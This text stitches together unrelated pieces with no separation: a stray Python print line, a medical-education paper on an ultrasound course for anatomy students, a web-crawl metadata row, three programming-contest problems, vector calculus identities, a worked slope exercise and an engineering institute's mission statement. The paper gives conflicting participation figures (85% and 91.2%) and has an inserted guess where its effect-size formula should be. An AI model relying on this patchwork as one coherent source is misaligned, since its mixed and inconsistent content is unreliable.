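print(round(implied_pooled_sd, 2))  # 3.49
```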
Ultrasound is an important and indispensable technology in medicine. Due to its nonradiative and noninvasive nature, ultrasound has long been used in specialties such as radiology, obstetrics/gynecology, and cardiology. There are increasingly more ultrasound applications in specialties such as emergency medicine and critical care medicine [1, 2]. Because ultrasound is vital to clinical practice, it should be taught and emphasized in medical education. Portable ultrasound came to be seen as the visual stethoscope and it started to be used as a tool in learning anatomy [4,5,6,7,8,9]. Many studies have shown that exposing undergraduate students to ultrasound can increase their interest, ultrasound skills and image recognition ability [4, 10]. It is reasonable that students improve their ultrasound knowledge after taking a course with an ultrasound curriculum. Several studies have also discussed the effect of ultrasound training on gross anatomy knowledge, but previous studies have shown mixed outcomes [4,5,6,7,8,9].
Some studies have investigated ultrasound and sonoanatomy education for medical students [4,5,6,7,8,9]. However, only two of these studies have suggested that ultrasound education not only improves medical students’ ultrasound knowledge and skills but also enhances their anatomical knowledge [4, 8]. The similarities between these two studies are hands-on practice and integration with anatomy courses [4, 8]. The remaining studies showed no statistically significant improvement [5,6,7]. Interestingly, the studies with hands-on practice showed a significant impact [4, 8], but those without ultrasound practice did not have significant results [5,6,7]. Only one study with hands-on practice showed no significant result, but there the ultrasound was taught by undergraduate students. The importance of hands-on practice in ultrasound imaging has been emphasized by other authors as well. These results suggest that learning by doing could be an effective approach to learning anatomy, possibly owing to the concrete experience gained during practice.
However, written assessments in the studies included both ultrasound and gross anatomy images; thus the studies did not analyze the effect of ultrasound on gross anatomy learning individually [4,5,6,7]. It is difficult to identify whether the educational gains originated from the improvement of knowledge in ultrasound, gross anatomy, or both. Based on the “learning by doing” theory and the experiential learning theory , a Parallel Ultrasound Hands-on (PUSH) course was designed for sonoanatomy. The impact of this course on anatomy learning in both written tests and practical assessments on cadavers was investigated. The hypotheses of our study are the following:
Hypothesis 1: PUSH training enhances theoretical knowledge of anatomy, evidenced by improved performance in written assessments.
Hypothesis 2: PUSH training enhances applied knowledge of anatomy, evidenced by improved performance in cadaver laboratory tests.
This crossover study enrolled undergraduate third-year medical students who had just started the anatomy curriculum (the doctor of medicine curriculum in Taiwan includes 4 years of preclinical education and 2 years of clinical training in the hospital). Participating students came from a single institution (Taipei Medical University) in Taiwan. Participants who had any prior experience of ultrasound lectures or hands-on workshops were excluded. This study analyzed the impact of incorporating theoretical and practical ultrasonography training into the preclinical human anatomy curriculum.
The Parallel Ultrasound Hands-on (PUSH) course was designed to complement the regular anatomy training held throughout a 6-month period. The curricula of the two courses (PUSH and traditional anatomy) were developed in parallel, but without direct integration between them (Supplementary Material 1). The PUSH course included seven 40-min lectures (see figure for the course design), each held shortly in advance of the corresponding formal anatomy class, as well as two hands-on practical workshops. The lecture contents focused on selected structures in the chest and abdomen, including the heart, hepatobiliary system, urinary system, and great vessels; only a basic ultrasound introduction, ultrasound images, and practice techniques were taught in the lectures. In addition, the course included two 120-min workshops (tutor/learner ratio 1:4; all tutors were residents who had received 6 months of ultrasound faculty training in the clinical skill center of WanFang Hospital and obtained certification) that focused on checklist-guided hands-on practice (Supplementary Material 2) covering the anatomical structures included in the lectures. Each workshop (120 min) focused on two different systems (60 min each). During the workshops, tutors demonstrated first, and students then performed hands-on ultrasonographic identification of the target anatomical structures on each other. Learners were given ample time to practice the ultrasound skills and knowledge acquired during the lectures. Target anatomical structures included the cardiovascular, hepatobiliary, and urinary systems. In each system, every student had 15 minutes of hands-on practice and 45 minutes of observation and discussion with the tutor and scanner. Clear learning goals and tasks were made explicit through an ultrasound checklist provided at the beginning of the course. Students also received real-time feedback from the tutors to ensure that they appropriately identified checklist items.
Of 164 eligible medical students, 140 (85%) voluntarily participated in this elective course, with no dropout. The percentage of participation was about 91.2%. Students were assigned to two groups based on their schedule availability. One group participated in the PUSH course during the first half of the semester, and the other group participated in the latter half of the semester (Fig. 1). The midterm and final examination scores of the traditional anatomy course were used to measure the educational impact of the PUSH course. The mean score differences between the two groups in the midterm and final examinations were analyzed. Although the examinations’ blueprints covered the entire human anatomy curriculum, the analysis included only assessment items on anatomical structures covered in the PUSH course. The anatomy examination format included written items and laboratory test items on cadavers. The analysis included 50 single-answer multiple choice items from the written test and 50 items on the laboratory test; these items were not specifically associated with ultrasonographic knowledge, performance skills, or images.
In addition to the midterm and final examination scores, the PUSH course included the completion of a learning self-efficacy scale which is designed to measure learners’ confidence in their capability to learn specific subjects (Supplementary Material 3). The item order and descriptions were similar to those of the original published version but were translated to Traditional Mandarin Chinese . The scale consisted of 12 items and covered the cognitive, affective, and psychomotor domains of sonoanatomy training. There were four items in each domain rated with a five-point Likert scale (from 1 to 5; strongly disagree to strongly agree and the neutral value is 3).
An independent t-test was conducted to test for differences in baseline characteristics, written test scores for target anatomy, laboratory examination scores for target anatomy, and learning self-efficacy between the two groups. A dependent sample t-test was employed to test improvement in target anatomy in the written and laboratory tests, with the sample stratified by group. Because t-tests were used in the present study, t-values are also presented based on the t distribution of the values obtained between groups or for paired data. When the absolute t value of a test exceeds 1.96, the finding is considered statistically significant. The post hoc effect size was calculated with the following formula:
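The formula itself is not reproduced in the text; a standard post hoc effect size consistent with the symbol definitions that follow is Cohen's d with an equal-weight pooled standard deviation (this particular form is an assumption on our part):

```latex
d \;=\; \frac{\bar{x}_1 - \bar{x}_2}{\sqrt{\left(\sigma_1^{2} + \sigma_2^{2}\right)/2}}
```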
Here \(\bar{x}_1\) refers to the mean number of correct items in group 1 and \(\bar{x}_2\) to the mean number of correct items in group 2; likewise, \(\sigma_1\) indicates the standard deviation of correct items in group 1, and \(\sigma_2\) the standard deviation of correct items in group 2.
Because learning self-efficacy was measured in a one-shot survey after the PUSH course, the difference in learning self-efficacy between the two groups was not part of the aims of this study. The scale was used to explore students’ efficacy in learning, the data was analyzed using a critical value test with a neutral score value of 3. If the test value was significantly higher than 3, medical students had positive efficacy in learning sonoanatomy. The analysis included the differences among the three domains of learning self-efficacy after the PUSH course. A general linear model was utilized to compare differences among the domains. If a P-value lower than 0.05 was achieved, the outcome reached statistical significance.
The two groups had similar characteristics, including male and female percentage (chi-square = 0.36; P = 0.866) and scores on other anatomy items on the written examination (MD = 1.0; 3.5%; P = 0.233) and laboratory examination (MD = 0.6; 2.4%; P = 0.515). The only statistically significant difference in test scores between the groups was observed in the midterm written examination. In the first study period, group 1 had a higher written test score for target anatomy (mean correct items = 12.7, 63.5%) than group 2 (mean correct items = 11.2, 55.8%) after the ultrasound course (MD = 1.5(7.6%); P = 0.014), but there was no difference in the laboratory examination score for target anatomy between the two groups (mean correct items in group 1 = 11.6, 44.6%; mean correct items in group 2 = 10.9, 41.8%; MD = 0.7(2.8%); P = 0.308) (Table 1). In the second study period, group 2 received an ultrasound course and had no significant difference in target anatomy in either the written examination (mean correct items in group 1 = 12.8, 60.9%; mean correct items in group 2 = 12.5, 62.4%; MD = 0.3(1.6%); P = 0.472) or the laboratory examination (mean correct items in group 1 = 10.1, 47.9%; mean correct items in group 2 = 9.8, 46.4%; MD = 0.3(1.5%); P = 0.592) compared to group 1 (Table 2).
Furthermore, there was no significant difference in learning self-efficacy of sonoanatomy between the two groups after the PUSH course (Table 3). Overall Cronbach’s alpha was 0.899 (subscales: cognitive domain 0.890, affective domain 0.803, psychomotor domain 0.839). Participants provided positive feedback in overall learning self-efficacy after the PUSH course (Mean = 3.68, SD = ±0.56; P < 0.001). Similar results were observed in all three subdomains of learning self-efficacy. The students reported positive learning self-efficacy in the cognitive domain (Mean = 3.91, SD = ±0.67; P < 0.001), affective domain (Mean = 3.33, SD = ±0.66; P < 0.001), and psychomotor domain (Mean = 3.79, SD = ±0.69; P < 0.001). Differences in learning self-efficacy among the subdomains were observed. Learning self-efficacy in the cognitive domain was significantly higher than that in the affective domain (MD = 0.58; P < 0.001) and psychomotor domain (MD = 0.12; P = 0.011). Learning self-efficacy in the affective domain was significantly lower than that in the psychomotor domain (MD = − 0.46; P < 0.001) (Table 4).
The gap between ultrasound images and the gross anatomy
This study found that the group receiving the PUSH course intervention increased scores on the written test in the midterm examination but showed no significant improvement in the gross anatomy laboratory examination. This result may be due to the vast difference between ultrasound images and the actual appearance of gross anatomy in the cadaver. Generally, ultrasound helps students learn the location and relationships of anatomical structures and their disposition in a living human body, strengthening their cognition and concepts of anatomy. Additionally, medical students can observe dynamic changes in the heart and the blood flow of vessels through ultrasound. Ultrasonography allows medical students to learn anatomy from a different point of view. However, these advantages might not be applicable to the recognition of organs or structures of cadaveric origin. There is a large gap between monochromatic images and the appearance of cadaveric organs or structures. Results from previous studies suggest that ultrasonographic training can aid learners’ understanding of anatomical concepts (such as the three-dimensional orientation and spatial correlation of anatomical structures within the body), which may complement and enhance the traditional anatomical curriculum [16, 17].
Several institutions integrate ultrasound training in general medical education, including anatomy and physical examination . Many studies have revealed positive findings for student satisfaction, but the learning outcomes of anatomy via ultrasound curricula are controversial [4, 5, 9, 19, 20]. Many of these studies lacked control or pre-intervention groups in learning outcome evaluation. There is still insufficient evidence to suggest that ultrasound training leads to significant improvement in anatomical knowledge or physical examination skills of undergraduate medical students . This study attempted to overcome these gaps by utilizing a crossover study design and created an additional ultrasound course that was independent of the current anatomy curriculum. We found that by participating in an elective ultrasound course, undergraduate medical students were able to improve their midterm but not final anatomy written examination scores.
The reasons for the effect of PUSH on anatomy learning
There may be several reasons for the findings of this study. First, the results of learning self-efficacy at the end of the semester showed the cognitive domain is significantly higher than that in the psychomotor domain. The early exposure of medical students to clinical tools can increase their learning motivation and interest because it enables them to understand how to apply their anatomy knowledge to clinical practice by learning ultrasound [21, 22], and this creates awareness of the importance of anatomy in the preclinical training years. Bridging anatomy knowledge and clinical practice is important and can enable medical students to understand the need for a functional understanding of anatomy [5, 21]. Ultrasonographic training also provides a clinical context to justify the need for anatomical knowledge, making anatomy more concrete and practical .
Second, the use of ultrasound to support anatomy instruction allows students to observe the dynamic changes in organs, such as the opening and closing of heart valves, the direction of blood flow and the importance of heart physiology features, such as ejection fraction and cardiac output. This allows learners to gain more insight of the application of anatomy to the understanding of clinical medicine. Third, medical students learn to operate ultrasound probes to identify relevant anatomical structures through hands-on ultrasonographic training. This process enables learners to develop a three-dimensional understanding of the disposition of specific structures in the body and their spatial relationships.
Ultrasound training improves anatomy learning
Previous studies showed varied outcomes in exploring the efficacy of learning gross anatomy via ultrasound [4,5,6,7,8,9]. It is difficult to reach specific conclusions because of significant differences in curricular design. By reviewing previously published studies, a new curriculum was designed and implemented, yielding positive educational outcomes. The main features of this curriculum were a hands-on practical approach in a small group setting, and included a crossover study design to compare the educational outcome. Most studies did not include a hands-on component in their ultrasound course design [5,6,7] and none of them provided students with the opportunity to develop ultrasound skills by concrete experience. Conducting ultrasonographic examinations on real humans strongly strengthens the three-dimensional perception of human anatomy . To minimize any negative effects of elective ultrasonography training on the original compulsory gross human anatomy course, the PUSH course was conducted in a manner that did not affect the time allotted to the study of gross anatomy. Many studies assessed ultrasound ability and knowledge in tests and did not report these results separately [4,5,6,7]. Consequently, it is unclear whether their observations were due to improvements in anatomy knowledge or ultrasound knowledge. It may be taken for granted that the scores of ultrasound knowledge would improve after learning ultrasound compared to the scores of learners who did not have this opportunity. Hence, to focus on the effect of learning anatomy itself, this study did not include any specific ultrasound imaging or knowledge evaluation. Only anatomy written tests and cadaver laboratory tests were conducted. Holding a parallel curriculum could improve students’ acquisition of anatomical knowledge with the aid of ultrasound training.
Characteristics of the PUSH course
These findings may be related to several specific characteristics of the PUSH course. The course methodology had four particular features. First, learners participated voluntarily in the course because they could gain early exposure to clinical medicine that would be valuable for their future and increased their motivation. Second, during the hands-on workshops, learners were given enough time to practice ultrasound skills and knowledge acquired during the lectures. This meant that these students could adopt learning strategies depending on their educational needs and preferences . Third, clear learning goals and tasks were made explicit through an ultrasound checklist provided at the beginning of the course, which allowed learners to prepare before the workshops. Fourth, on-site tutors corrected students’ manipulation of ultrasound probes and ensured that they appropriately identified checklist items through synchronous observation and feedback.
These features differ from those of previous studies on ultrasound integrated with anatomy [3,4,5,6,7, 9]. Therefore, these findings suggest that future integration of ultrasound and anatomy courses requires careful consideration of the course design, including self-directed learning as well as checklist-oriented, hands-on workshops with on-site tutors. Traditionally, ultrasound learning was provided exclusively during the clinical formative years, but the results of this study suggest that ultrasonographic training is a feasible form of early clinical exposure that can not only motivate learners but also help them bridge the gap between preclinical training and the practice of medicine.
Limitations of the study
This study had some limitations. First, the blueprint of the cadaveric laboratory assessment was not specifically aligned with the ultrasound curriculum; therefore, any cadaveric laboratory test improvement observed in this study may not be directly related to the ultrasonographic training. Second, students received ultrasound checklists at the beginning of the course and tutors were available for immediate feedback during hands-on practice, but we did not evaluate students’ ultrasound learning outcomes systematically. Third, it is hard to ascertain how the additional lectures that students received as part of the PUSH course may have influenced the test results, as they presumably contained reviews of the anatomy, thus confounding the true impact of the ultrasound intervention. Fourth, all 140 of the 164 learners who joined the study were volunteers, which may introduce self-selection bias: students who participate voluntarily may be more motivated, so the results of this study may not generalize to the entire student population. Future studies should attempt to avoid these limitations.
Overall, the PUSH course with its active learning played a supportive role in learning anatomy and responded to the trends in clinical practice, in which ultrasound is becoming a common tool of the modern clinician. The findings of this study suggest that the implementation of a sonoanatomy course enhanced students’ learning in the field of anatomy.
Availability of data and materials
The datasets used and/or analyzed during the current study are available from the corresponding author on reasonable request.
Parallel UltraSound Hands-on
Maitino AJ, Levin DC, Rao VM, Parker L, Sunshine JH. Do emergency medicine physicians perform ultrasound and conventional radiography in the emergency department? Recent trends from 1993 to 2001. J Am Coll Radiol 2005;2:274–278.
POLICY STATEMENT Ultrasound Guidelines: Emergency, Point-of-care, and Clinical Ultrasound Guidelines in Medicine. 2016.
Gillman LM, Kirkpatrick AW. Portable bedside ultrasound: the visual stethoscope of the 21st century. Scand J Trauma Resusc Emerg Med. 2012;20:18. https://doi.org/10.1186/1757-7241-20-18.
Dreher SM, Dephilip R, Bahner D. Ultrasound exposure during gross anatomy. J Emerg Med. 2014;46:231–40.
Finn GM, Sawdon M, Griksaitis M. The additive effect of teaching undergraduate cardiac anatomy using cadavers and ultrasound echocardiography. Eur J Anat. 2012;16:199–205.
Griksaitis MJ, Sawdon MA, Finn GM. Ultrasound and cadaveric prosections as methods for teaching cardiac anatomy: a comparative study. Anat Sci Educ. 2012;5:20–6.
Canty DJ, Hayes JA, Story DA, Royse CF. Ultrasound simulator-assisted teaching of cardiac anatomy to preclinical anatomy students: a pilot randomized trial of a three-hour learning exposure. Anat Sci Educ. 2015;8:21–30.
Kondrashov P, Johnson JC, Boehm K, Rice D, Kondrashova T. Impact of the clinical ultrasound elective course on retention of anatomical knowledge by second-year medical students in preparation for board exams. Clin Anat. 2015;28:156–63.
Knobe M, Carow JB, Ruesseler M, Leu BM, Simon M, Beckers SK, et al. Arthroscopy or ultrasound in undergraduate anatomy education: a randomized cross-over controlled trial. BMC Med Educ 2012;12:85.
Ivanusic J, Cowie B, Barrington M. Undergraduate student perceptions of the use of ultrasonography in the study of “Living Anatomy” Anat Sci Educ 2010;3:318–322.
Knudsen L, Nawrotzki R, Schmiedl A, Mühlfeld C, Kruschinski C, Ochs M. Hands-on or no hands-on training in ultrasound imaging: a randomized trial to evaluate learning outcomes and speed of recall of topographic anatomy. Anat Sci Educ. 2018;11:575–91. https://doi.org/10.1002/ASE.1792.
Dewey J. Experience and Thinking. In: Democracy and Education. 1916. p. 735. https://doi.org/10.2307/2178611.
Yardley S, Teunissen PW, Dornan T. Experiential learning: transforming theory into practice. Med Teach. 2012;34:161–4.
Kang Y-N, Chang C-H, Kao C-C, Chen C-Y, Wu C-C. Development of a short and universal learning self-efficacy scale for clinical skills. PLoS One 2019;14:e0209155. https://doi.org/10.1371/journal.pone.0209155.
Alexander SM, Pogson KB, Friedman VE, Corley JL, Hipolito Canario DA, Johnson CS. Ultrasound as a learning tool in bachelor-level anatomy education. Med Sci Educ. 2021;31:193–6. https://doi.org/10.1007/S40670-020-01170-1/FIGURES/2.
Gunderman RB, Wilson PK. Viewpoint: exploring the human interior: the roles of cadaver dissection and radiologic imaging in teaching anatomy. Acad Med. 2005;80:745–9. https://doi.org/10.1097/00001888-200508000-00008.
Sugand K, Abrahams P, Khurana A. The anatomy of anatomy: a review for its modernization. Anat Sci Educ 2010;3:NA-NA. https://doi.org/10.1002/ase.139.
Davis JJ, Wessner CE, Potts J, Au AK, Pohl CA, Fields JM. Ultrasonography in undergraduate medical education: a systematic review. J Ultrasound Med. 2018;37:2667–79. https://doi.org/10.1002/jum.14628.
Gradl-Dietsch G, Korden T, Modabber A, Sönmez TT, Stromps J-P, Ganse B, et al. Multidimensional approach to teaching anatomy—do gender and learning style matter? Ann Anatomy-Anatomischer Anzeiger. 2016;208:158–64.
Jamniczky HA, Cotton D, Paget M, Ramji Q, Lenz R, McLaughlin K, et al. Cognitive load imposed by ultrasound-facilitated teaching does not adversely affect gross anatomy learning outcomes. Anat Sci Educ. 2017;10:144–51. https://doi.org/10.1002/ase.1642.
Prince KJAH, van de Wiel M, Scherpbier AJJA, Cess PM, Boshuizen HPA. A qualitative analysis of the transition from theory to practice in undergraduate training in a PBL-medical school. Adv heal. Sci Educ. 2000;5:105–16.
Başak O, Yaphe J, Spiegel W, Wilm S, Carelli F, Metsemakers JFM. Early clinical exposure in medical curricula across Europe: an overview. Eur J Gen Pract. 2009;15:4–10.
Skalski JH, Elrashidi M, Reed DA, Mcdonald FS, Bhagra A. Using standardized patients to teach point-of-care ultrasound-guided physical examination skills to internal medicine residents. J Grad Med Educ. 2015;7:95–7. https://doi.org/10.4300/JGME-D-14-00178.1.
Ericsson KA, Krampe RT, Tesch-Romer C. The role of deliberate practice in the acquisition of expert performance. Psychol Rev. 1993;100:363–406.
Hill M, Peters M, Salvaggio M, Vinnedge J, Darden A. Implementation and evaluation of a self-directed learning activity for first-year medical students Med Educ Online 2020;25:1717780. https://doi.org/10.1080/10872981.2020.1717780.
The authors thank our colleagues Hao-Yu Chen and Hung-Chen Chen in the Center for Education in Medical Simulation (CEMS) Taipei Medical University, who provided insight and expertise that greatly assisted the research. In addition, all authors appreciate the anatomical education and the curricular structure from professor Tsorng-Harn Fong in Department of Anatomy and Cell Biology, School of Medicine, College of Medicine, Taipei Medical University. This research was supported by Municipal Wan-Fang Hospital, Taipei Medical University.
The present study is funded by Taipei Medical University, Wan Fang Hospital Research Grant 107-wf-swf-06 and 108-wf-swf-07. The funders had no role in the design of this study and did not have any role during its execution, analyses, interpretation of the data, or decision to submit results.
Ethical approval and consent to participate
The study was approved by Taipei Medical University Joint Institutional Review Board (TMU-JIRB) for Human Experimentation. The number of IRB was TMU-JIRB N201909012.
Since data was collected through a post-course survey, the TMU-JIRB suggested that verbal informed consent was sufficient. Informed consent: Informed consent was obtained from all individual participants included in the study.
Consent for publication
The authors declare no competing financial interest.
Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
Additional file 1.
Additional file 2.
Additional file 3.
Rights and permissions
Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article's Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article's Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/. The Creative Commons Public Domain Dedication waiver (http://creativecommons.org/publicdomain/zero/1.0/) applies to the data made available in this article, unless otherwise stated in a credit line to the data.
About this article
Cite this article
Chen, WT., Kang, YN., Wang, TC. et al. Does ultrasound education improve anatomy learning? Effects of the Parallel Ultrasound Hands-on (PUSH) undergraduate medicine course. BMC Med Educ 22, 207 (2022). https://doi.org/10.1186/s12909-022-03255-4
- Gross anatomy education
- Medical education
- Undergraduate ultrasound education
- Parallel ultrasound course | <urn:uuid:7edbec67-1c51-443b-a3d4-4dc2a34c93ab> | CC-MAIN-2023-14 | https://bmcmededuc.biomedcentral.com/articles/10.1186/s12909-022-03255-4 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949644.27/warc/CC-MAIN-20230331144941-20230331174941-00006.warc.gz | en | 0.931846 | 6,901 | 2.5625 | 3 |
Sort of Sorting
Can you believe school has already started? It seems like we were just finishing last semester. Last semester was tough because the administration had a hard time keeping records of all the students in order, which slowed everything down. This year, they are going to be on top of things. They have recognized that you have the skills to help them get into shape with your programming ability, and you have volunteered to help. You recognize that the key to getting to student records quickly is having them in a sorted order. However, they don’t really have to be perfectly sorted, just so long as they are sort-of sorted.
Write a program that sorts a list of student last names, but the sort only uses the first two letters of the name. Nothing else in the name is used for sorting. However, if two names have the same first two letters, they should stay in the same order as in the input (this is known as a ‘stable sort’). Sorting is case sensitive based on ASCII order (with uppercase letters sorting before lowercase letters, i.e., $A < B < \ldots < Z < a < b < \ldots < z$).
Input consists of a sequence of up to $500$ test cases. Each case starts with a line containing an integer $1 \leq n \leq 200$. After this follow $n$ last names made up of only letters (a–z, lowercase or uppercase), one name per line. Names have between $2$ and $20$ letters. Input ends when $n = 0$.
For each case, print the last names in sort-of-sorted order, one per line. Print a blank line between cases.
Sample Input 1:

3
Mozart
Beethoven
Bach
5
Hilbert
Godel
Poincare
Ramanujan
Pochhammmer
0

Sample Output 1:

Bach
Beethoven
Mozart

Godel
Hilbert
Poincare
Pochhammmer
Ramanujan
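The key observation is that a stable sort on the two-letter prefix is exactly what is required. A sketch in Python (an illustrative choice of language; the full stdin loop over cases is omitted):

```python
def sort_of_sort(names):
    # sorted() is guaranteed stable: names sharing the same two-letter
    # prefix keep their original relative order, as the problem requires.
    # Python compares strings by code point, so uppercase letters sort
    # before lowercase ones, matching the ASCII rule.
    return sorted(names, key=lambda s: s[:2])

# The second sample case:
case = ["Hilbert", "Godel", "Poincare", "Ramanujan", "Pochhammmer"]
print("\n".join(sort_of_sort(case)))
```

A complete submission would read cases until $n = 0$ and print a blank line between consecutive cases.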
You stay in a cottage at a clearing in a forest. The forest consists of $V$ clearings and $E$ trails. Clearings are open spots where fruits may be found, and are numbered from $1$ to $V$. Your cottage is at clearing $1$. Each trail connects two clearings. You ensure self-sustainability by gathering fruits in the forest for food.
Through extensive reconnaissance, you learn that there are $C$ clearings containing exactly one batch of growing fruits. You also learn that fruits in this forest, once picked, will take $K$ days to grow before it is ready to be picked again. (A fruit picked on day $X$ is ready to be picked again on day $X + K$)
It is currently day $1$. Coincidentally, all $C$ clearings have one batch of fruits ready to be picked. From now until day $M$ inclusive, what is the minimum distance you have to walk per day in order to be able to gather at least one batch of fruits and return to your cottage every day?
The first line of the input contains $5$ integers $V$ ($1 \leq V \leq 20\, 000$) $E$ ($1 \leq E \leq 100\, 000$) $C$ ($1 \leq C \leq V$) $K$ ($1 \leq K \leq 2\, 000\, 000\, 000$) and $M$ ($1 \leq M \leq 2\, 000\, 000\, 000$).
The following $E$ lines contain $3$ space-separated integers each, $u_ i\: v_ i\: w_ i$ ($1 \leq u_ i, v_ i \leq V$, $1 \leq w_ i \leq 1\, 000\, 000$), describing a trail that directly connects clearing $u_ i$ to clearing $v_ i$ with a length of $w_ i$ unit distance. There is at most one trail directly connecting any two clearings, and no trail connects a clearing to itself. There may be clearings that cannot be reached from the cottage.
The last line of the input contains $C$ distinct space separated integers $f_1$ to $f_ C$ ($1 \leq f \leq V$), the clearings where fruits grow.
Output a single value—the required answer. If it is impossible to gather at least one batch of fruits every day from day $1$ until day $M$, output $-1$ instead.
(25 Points): $C = 1, K = 1$
(25 Points): $C = M, K = M$
(30 Points): $1 \leq M \leq 100\, 000$
(20 Points): No additional constraint.
Sample Input Explanation
For sample $1$, there are $2$ clearings with fruits, one located at clearing $2$ ($1$ unit distance away from the cottage) and one located at clearing $3$ ($2$ unit distance away from the cottage). Suppose you pick the fruit at clearing $2$ on day $1$. The total distance traveled on this day is $2$ units: the distance from your cottage to clearing $2$ and back. On day $2$, the fruit at clearing $2$ has not grown back yet (it will be available for picking on day $3$), and you will have to walk to clearing $3$ for fruits. The furthest distance you have walked in a single day so far is $4$ units: the distance from the cottage to clearing $3$ and back. The answer is the same if you had instead picked the fruits at clearing $3$ first and then clearing $2$.
For sample $2$, the fruits at both clearings do not grow back in time.
Sample Input 1:

3 2 2 2 3
1 2 1
2 3 1
2 3

Sample Output 1:

4

Sample Input 2:

3 2 2 3 3
1 2 1
2 3 1
2 3

Sample Output 2:

-1
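One way to attack this (a sketch of the reasoning, not a verified reference solution): a clearing picked on day $x$ is next available on day $x + K$, so each clearing can be used at most once in any $K$ consecutive days. Covering every day therefore needs $\min(K, M)$ distinct reachable fruit clearings, and cycling through the $\min(K, M)$ clearings with the smallest round-trip distances from the cottage minimizes the worst daily walk. In Python (illustrative):

```python
import heapq

def min_daily_walk(V, edges, fruits, K, M):
    # Single-source shortest paths from the cottage (clearing 1) via Dijkstra.
    adj = [[] for _ in range(V + 1)]
    for u, v, w in edges:
        adj[u].append((v, w))
        adj[v].append((u, w))
    INF = float("inf")
    dist = [INF] * (V + 1)
    dist[1] = 0
    pq = [(0, 1)]
    while pq:
        d, u = heapq.heappop(pq)
        if d > dist[u]:
            continue
        for v, w in adj[u]:
            nd = d + w
            if nd < dist[v]:
                dist[v] = nd
                heapq.heappush(pq, (nd, v))
    # Each clearing is usable at most once per K-day window, so we need
    # min(K, M) distinct reachable fruit clearings; keep the cheapest ones.
    need = min(K, M)
    trips = sorted(2 * dist[f] for f in fruits if dist[f] < INF)
    return trips[need - 1] if len(trips) >= need else -1

print(min_daily_walk(3, [(1, 2, 1), (2, 3, 1)], [2, 3], K=2, M=3))  # 4 (sample 1)
```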
Boating season is over for this year, and Theseus has parked his boat on land. Of course, the boat looks nothing like it did as of the beginning of the season; it never does. You see, Theseus is constantly looking for ways to improve his boat.
At every day of the boating season, Theseus bought exactly one type of item at his local supply store, and replaced the existing part on his boat with it. Now, as the season has ended, Theseus wonders what day he replaced all the parts from the previous season.
The first line of the input consists of two space-separated integers $P$ and $N$, representing the number of parts the boat consists of, and the number of days in the boating season, respectively.
Then follows $N$ lines, each line has a single word $w_ i$, the type of boat part that Theseus bought on day $i$.
Output the day Theseus ended up replacing the last existing part from the previous season, or paradox avoided if Theseus never ended up replacing all the different parts.
$1 \leq P \leq N \leq 1\, 000$.
Each word $w_ i$ will consist only of the letters a–z and _ (underscore).
Each word $w_ i$ will be between $1$ and $20$ characters long.
The number of distinct $w_ i$s will be at most $P$.
Sample Input 1:

3 5
left_oar
right_oar
left_oar
hull
right_oar

Sample Output 1:

4

Sample Input 2:

4 5
motor
hull
left_oar
hull
motor

Sample Output 2:

paradox avoided
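The problem reduces to counting distinct part types seen so far; the answer is the first day on which that count reaches $P$. A Python sketch (the function name is illustrative):

```python
def last_replacement_day(P, purchases):
    # Track distinct part types bought so far; the last old part is gone
    # on the first day all P types have been bought at least once.
    seen = set()
    for day, part in enumerate(purchases, start=1):
        seen.add(part)
        if len(seen) == P:
            return day
    return "paradox avoided"

print(last_replacement_day(3, ["left_oar", "right_oar", "left_oar", "hull", "right_oar"]))  # 4
```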
Curl of the gradient:
The curl of the gradient of any scalar field φ is always the zero vector field
$$ \nabla \times (\nabla \varphi)=0 $$
Divergence of the curl:
The divergence of the curl of any vector field F is always zero.
$$ \nabla \cdot(\nabla \times F)=0 $$
Divergence of the gradient:
The Laplacian of a scalar field is the divergence of its gradient
$$ \nabla^2 f = \nabla \cdot \nabla f $$
the result is a scalar quantity.
Curl of the curl:
$$ \nabla \times (\nabla \times A) = \nabla (\nabla \cdot A) -\nabla^2A $$
Here, $\nabla^2$ denotes the vector Laplacian operating on the vector field $A$.
Find the slope of the line, which makes an angle of $30^\circ $ with the positive direction of y-axis measured anticlockwise.
Hint: Visualize the given information on the coordinate axes. The slope of a line is found from the angle measured from the line with respect to the positive x-axis.
Complete step-by-step answer:
Given that a line makes an angle of $30^\circ $ with the positive y-axis measured anti clockwise.
That means the corresponding figure shows the line making an angle of $30^\circ $ with the positive y-axis, measured anticlockwise.
We need to find the $\theta $, which is measured from the line with respect to positive x-axis.
Then $\theta = 30^\circ + 90^\circ = 120^\circ $
Thus, slope of the given line is $\tan \theta = \tan 120^\circ $
$ \Rightarrow \tan 120^\circ = \tan (180^\circ - 60^\circ ) = - \tan 60^\circ = - \sqrt 3 $
$\therefore $ The slope of the given line is $ - \sqrt 3 $.
Note: To find the slope of a line, we find the inclination angle and take the tangent of that angle. The inclination angle is the angle measured between the line and the positive x-axis. We need to know the basic trigonometric function values to solve these kinds of problems.
We used the values $\tan (180^\circ - \theta ) = - \tan \theta $ and $\tan 60^\circ = \sqrt 3 $.
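The result can be confirmed numerically (note that `math.tan` works in radians, so the angle is converted first):

```python
import math

angle_deg = 30 + 90  # angle with the positive x-axis, as derived above
slope = math.tan(math.radians(angle_deg))

print(slope)  # approximately -1.732..., i.e. -sqrt(3)
```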
Computer Engineering is changing rapidly; at the institute, we aim to fast-track our progress so as to keep pace with these changes.
To be a leading Institute of Computer Engineering in Africa and beyond.
To produce graduates in Computer Engineering who are experts in Software and Hardware Infrastructure, development and Maintenance.
• Train highly skilled ICT personnel in the fields of Computer Engineering, Computer Technology and Information Technology
• Perform research in the Computer Engineering and ICT fields and produce up-to-date and innovative results
• Expand training opportunities in the Computer Engineering and ICT fields in Africa
• Provide appropriate ICT solutions to Africa's ICT industries
About Computer Engineering
Computer engineers design and develop computer hardware, software, peripheral devices, and communication networks. They are actively involved in web development by developing new features, tools, and services for the World Wide Web and the Internet. They manage the design, content and development of websites and features for the Internet including e-commerce, web streaming and Internet security.
